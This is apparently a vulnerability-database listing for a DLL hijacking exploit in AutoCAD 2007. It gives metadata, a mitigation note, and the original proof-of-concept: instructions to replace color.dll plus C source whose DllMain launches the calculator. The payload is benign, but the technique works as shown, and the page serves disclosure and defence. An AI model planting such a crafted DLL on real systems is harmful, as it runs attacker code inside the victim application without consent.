Autocad 2007 Professional dll (color.dll) Hijacking exploit

vendor:

Autocad 2007

by:

xsploited security

9,3

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Autocad 2007

Affected Version From: Autocad 2007

Affected Version To: Autocad 2007

Patch Exists: Yes

Related CWE: N/A

CPE: a:autodesk:autocad:2007

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2007

Autocad 2007 Professional dll (color.dll) Hijacking exploit

A vulnerability exists in windows that allows other applications dynamic link libraries to execute malicious code without the users consent, in the privelage context of the targeted application. The exploit involves replacing the color.dll in the Autocad 2007 directory with a maliciously crafted dll and launching Autocad 2007. This will cause the malicious code to be executed, in this case launching the calculator.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates. Additionally, ensure that all applications are running with the least amount of privileges necessary.

Source

Exploit-DB raw data:

/*
Description: 
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Title: Autocad 2007 Professional dll (color.dll) Hijacking exploit
Author: xsploited security
URL: http://www.x-sploited.com/
Email: xsploitedsecurity@gmail.com

Instructions:

1. Compile dll
2. Replace color.dll in autocad directory with your newly compiled dll
3. Launch Autocad 2007
4. Boom calc!

Shoutz:

kAoTiX, Deca, Drizzle, 0xJeremy, Sheep, SpliT, all other security guru's and teams.
*/

#include <windows.h>

int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}